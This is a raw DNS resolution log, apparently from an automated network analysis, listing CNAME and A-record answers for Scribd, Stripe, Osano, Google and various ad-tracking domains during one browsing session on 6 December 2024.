                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:15.276006937 CET1.1.1.1192.168.2.160x445eNo error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:15.276006937 CET1.1.1.1192.168.2.160x445eNo error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:15.276078939 CET1.1.1.1192.168.2.160x6ee6No error (0)www.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:16.529088974 CET1.1.1.1192.168.2.160xc79eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:16.529105902 CET1.1.1.1192.168.2.160xea6fNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.418952942 CET1.1.1.1192.168.2.160x4099No error (0)js.stripe.comdexeqbeb7giwr.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.418952942 CET1.1.1.1192.168.2.160x4099No error (0)dexeqbeb7giwr.cloudfront.net216.137.52.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.418952942 CET1.1.1.1192.168.2.160x4099No error (0)dexeqbeb7giwr.cloudfront.net216.137.52.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.418952942 CET1.1.1.1192.168.2.160x4099No error (0)dexeqbeb7giwr.cloudfront.net216.137.52.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.418952942 CET1.1.1.1192.168.2.160x4099No error (0)dexeqbeb7giwr.cloudfront.net216.137.52.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.424479961 CET1.1.1.1192.168.2.160x2b52No error (0)js.stripe.comstripecdn.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.133277893 CET1.1.1.1192.168.2.160xe493No error (0)html.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.133277893 CET1.1.1.1192.168.2.160xe493No error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.133277893 CET1.1.1.1192.168.2.160xe493No error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.133277893 CET1.1.1.1192.168.2.160xe493No error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.133277893 CET1.1.1.1192.168.2.160xe493No error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.134485960 CET1.1.1.1192.168.2.160x6ab2No error (0)html.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.783714056 CET1.1.1.1192.168.2.160x85d8No error (0)cmp.osano.comd2gt2ux04o03l1.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.783714056 CET1.1.1.1192.168.2.160x85d8No error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.783714056 CET1.1.1.1192.168.2.160x85d8No error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.783714056 CET1.1.1.1192.168.2.160x85d8No error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.783714056 CET1.1.1.1192.168.2.160x85d8No error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.783960104 CET1.1.1.1192.168.2.160xd0dbNo error (0)cmp.osano.comd2gt2ux04o03l1.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.891108990 CET1.1.1.1192.168.2.160x6503No error (0)cmp.osano.comd2gt2ux04o03l1.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.891213894 CET1.1.1.1192.168.2.160xa9beNo error (0)cmp.osano.comd2gt2ux04o03l1.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.891213894 CET1.1.1.1192.168.2.160xa9beNo error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.891213894 CET1.1.1.1192.168.2.160xa9beNo error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.891213894 CET1.1.1.1192.168.2.160xa9beNo error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.891213894 CET1.1.1.1192.168.2.160xa9beNo error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.079519987 CET1.1.1.1192.168.2.160x8b01No error (0)s-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.079519987 CET1.1.1.1192.168.2.160x8b01No error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.079519987 CET1.1.1.1192.168.2.160x8b01No error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.079519987 CET1.1.1.1192.168.2.160x8b01No error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.079519987 CET1.1.1.1192.168.2.160x8b01No error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.079530954 CET1.1.1.1192.168.2.160x6b24No error (0)s-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.696518898 CET1.1.1.1192.168.2.160xe663No error (0)js.stripe.comstripecdn.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.696583986 CET1.1.1.1192.168.2.160xa2adNo error (0)js.stripe.comdexeqbeb7giwr.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.696583986 CET1.1.1.1192.168.2.160xa2adNo error (0)dexeqbeb7giwr.cloudfront.net216.137.52.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.696583986 CET1.1.1.1192.168.2.160xa2adNo error (0)dexeqbeb7giwr.cloudfront.net216.137.52.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.696583986 CET1.1.1.1192.168.2.160xa2adNo error (0)dexeqbeb7giwr.cloudfront.net216.137.52.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.696583986 CET1.1.1.1192.168.2.160xa2adNo error (0)dexeqbeb7giwr.cloudfront.net216.137.52.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.993321896 CET1.1.1.1192.168.2.160x3a86No error (0)consent.api.osano.com52.222.144.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.993321896 CET1.1.1.1192.168.2.160x3a86No error (0)consent.api.osano.com52.222.144.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.993321896 CET1.1.1.1192.168.2.160x3a86No error (0)consent.api.osano.com52.222.144.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.993321896 CET1.1.1.1192.168.2.160x3a86No error (0)consent.api.osano.com52.222.144.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.030514002 CET1.1.1.1192.168.2.160xe29eNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.030514002 CET1.1.1.1192.168.2.160xe29eNo error (0)edge.gycpi.b.yahoodns.net188.125.88.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.030514002 CET1.1.1.1192.168.2.160xe29eNo error (0)edge.gycpi.b.yahoodns.net188.125.88.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.032388926 CET1.1.1.1192.168.2.160x5723No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.129158020 CET1.1.1.1192.168.2.160x51c8No error (0)b-code.liadm.comdetgh1asa1dg4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.158570051 CET1.1.1.1192.168.2.160x5043No error (0)b-code.liadm.comdetgh1asa1dg4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.158570051 CET1.1.1.1192.168.2.160x5043No error (0)detgh1asa1dg4.cloudfront.net3.164.182.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.158570051 CET1.1.1.1192.168.2.160x5043No error (0)detgh1asa1dg4.cloudfront.net3.164.182.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.158570051 CET1.1.1.1192.168.2.160x5043No error (0)detgh1asa1dg4.cloudfront.net3.164.182.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.158570051 CET1.1.1.1192.168.2.160x5043No error (0)detgh1asa1dg4.cloudfront.net3.164.182.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.457297087 CET1.1.1.1192.168.2.160x3e1bNo error (0)survey.survicate.comprdsurvey.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.595871925 CET1.1.1.1192.168.2.160x4f3No error (0)survey.survicate.comprdsurvey.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.595871925 CET1.1.1.1192.168.2.160x4f3No error (0)prdsurvey.b-cdn.net89.35.237.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.835345984 CET1.1.1.1192.168.2.160xadd5No error (0)wa.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.835345984 CET1.1.1.1192.168.2.160xadd5No error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.835345984 CET1.1.1.1192.168.2.160xadd5No error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.835345984 CET1.1.1.1192.168.2.160xadd5No error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.835345984 CET1.1.1.1192.168.2.160xadd5No error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.935508013 CET1.1.1.1192.168.2.160xe323No error (0)wa.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:25.946561098 CET1.1.1.1192.168.2.160xcab3No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:25.946719885 CET1.1.1.1192.168.2.160xd0b5No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:25.946719885 CET1.1.1.1192.168.2.160xd0b5No error (0)edge.gycpi.b.yahoodns.net188.125.88.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:25.946719885 CET1.1.1.1192.168.2.160xd0b5No error (0)edge.gycpi.b.yahoodns.net188.125.88.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.283839941 CET1.1.1.1192.168.2.160x6459No error (0)b-code.liadm.comdetgh1asa1dg4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.284420013 CET1.1.1.1192.168.2.160x7276No error (0)b-code.liadm.comdetgh1asa1dg4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.284420013 CET1.1.1.1192.168.2.160x7276No error (0)detgh1asa1dg4.cloudfront.net3.164.182.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.284420013 CET1.1.1.1192.168.2.160x7276No error (0)detgh1asa1dg4.cloudfront.net3.164.182.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.284420013 CET1.1.1.1192.168.2.160x7276No error (0)detgh1asa1dg4.cloudfront.net3.164.182.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.284420013 CET1.1.1.1192.168.2.160x7276No error (0)detgh1asa1dg4.cloudfront.net3.164.182.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.555943012 CET1.1.1.1192.168.2.160x2ba8No error (0)i.liadm.comidaas-ext.cph.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.555943012 CET1.1.1.1192.168.2.160x2ba8No error (0)idaas-ext.cph.liveintent.com52.73.207.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.555943012 CET1.1.1.1192.168.2.160x2ba8No error (0)idaas-ext.cph.liveintent.com34.201.214.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.555943012 CET1.1.1.1192.168.2.160x2ba8No error (0)idaas-ext.cph.liveintent.com54.80.88.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.555943012 CET1.1.1.1192.168.2.160x2ba8No error (0)idaas-ext.cph.liveintent.com52.55.72.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.555943012 CET1.1.1.1192.168.2.160x2ba8No error (0)idaas-ext.cph.liveintent.com34.194.4.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.555943012 CET1.1.1.1192.168.2.160x2ba8No error (0)idaas-ext.cph.liveintent.com35.169.51.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.555943012 CET1.1.1.1192.168.2.160x2ba8No error (0)idaas-ext.cph.liveintent.com3.208.153.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.555943012 CET1.1.1.1192.168.2.160x2ba8No error (0)idaas-ext.cph.liveintent.com3.218.55.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.683131933 CET1.1.1.1192.168.2.160x7dadNo error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.805149078 CET1.1.1.1192.168.2.160xf754No error (0)i.liadm.comidaas-ext.cph.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.879019022 CET1.1.1.1192.168.2.160xe8d0No error (0)wa.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.879019022 CET1.1.1.1192.168.2.160xe8d0No error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.879019022 CET1.1.1.1192.168.2.160xe8d0No error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.879019022 CET1.1.1.1192.168.2.160xe8d0No error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.879019022 CET1.1.1.1192.168.2.160xe8d0No error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.879529953 CET1.1.1.1192.168.2.160x101cNo error (0)wa.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915625095 CET1.1.1.1192.168.2.160x746cNo error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915625095 CET1.1.1.1192.168.2.160x746cNo error (0)livepixel-production.bln.liveintent.com44.221.168.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915625095 CET1.1.1.1192.168.2.160x746cNo error (0)livepixel-production.bln.liveintent.com50.16.43.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915625095 CET1.1.1.1192.168.2.160x746cNo error (0)livepixel-production.bln.liveintent.com3.82.168.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915625095 CET1.1.1.1192.168.2.160x746cNo error (0)livepixel-production.bln.liveintent.com3.214.107.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915625095 CET1.1.1.1192.168.2.160x746cNo error (0)livepixel-production.bln.liveintent.com52.54.248.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915625095 CET1.1.1.1192.168.2.160x746cNo error (0)livepixel-production.bln.liveintent.com54.160.73.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915625095 CET1.1.1.1192.168.2.160x746cNo error (0)livepixel-production.bln.liveintent.com23.21.229.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915625095 CET1.1.1.1192.168.2.160x746cNo error (0)livepixel-production.bln.liveintent.com44.195.149.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.136970997 CET1.1.1.1192.168.2.160x6d05No error (0)survey.survicate.comprdsurvey.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.136970997 CET1.1.1.1192.168.2.160x6d05No error (0)prdsurvey.b-cdn.net89.35.237.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.137320042 CET1.1.1.1192.168.2.160xf127No error (0)survey.survicate.comprdsurvey.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.126534939 CET1.1.1.1192.168.2.160xea6dNo error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.126534939 CET1.1.1.1192.168.2.160xea6dNo error (0)platform.twitter.map.fastly.net151.101.120.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.126763105 CET1.1.1.1192.168.2.160x7a14No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.127182961 CET1.1.1.1192.168.2.160xfd30No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.127182961 CET1.1.1.1192.168.2.160xfd30No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.127182961 CET1.1.1.1192.168.2.160xfd30No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.127494097 CET1.1.1.1192.168.2.160x87fcNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.127494097 CET1.1.1.1192.168.2.160x87fcNo error (0)scontent.xx.fbcdn.net157.240.195.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.169951916 CET1.1.1.1192.168.2.160x159cNo error (0)analytics.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.171134949 CET1.1.1.1192.168.2.160xa7afNo error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.315776110 CET1.1.1.1192.168.2.160x11dfNo error (0)td.doubleclick.net142.250.181.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.050172091 CET1.1.1.1192.168.2.160xedaNo error (0)live.rezync.com13.226.2.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.050172091 CET1.1.1.1192.168.2.160xedaNo error (0)live.rezync.com13.226.2.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.050172091 CET1.1.1.1192.168.2.160xedaNo error (0)live.rezync.com13.226.2.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.050172091 CET1.1.1.1192.168.2.160xedaNo error (0)live.rezync.com13.226.2.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.051166058 CET1.1.1.1192.168.2.160x5600No error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.051166058 CET1.1.1.1192.168.2.160x5600No error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.051166058 CET1.1.1.1192.168.2.160x5600No error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.051166058 CET1.1.1.1192.168.2.160x5600No error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.073625088 CET1.1.1.1192.168.2.160x3d62No error (0)d.turn.comd-ams1.turn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.073625088 CET1.1.1.1192.168.2.160x3d62No error (0)d-ams1.turn.com46.228.164.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.075186014 CET1.1.1.1192.168.2.160x7a3aNo error (0)b1sync.zemanta.comb1-use1.zemanta.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.075186014 CET1.1.1.1192.168.2.160x7a3aNo error (0)b1-use1.zemanta.comzemanta-nychi2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.075186014 CET1.1.1.1192.168.2.160x7a3aNo error (0)zemanta-nychi2.outbrain.orgchidc2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.075676918 CET1.1.1.1192.168.2.160x430aNo error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.075676918 CET1.1.1.1192.168.2.160x430aNo error (0)widget.nl3.vip.prod.criteo.com178.250.1.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
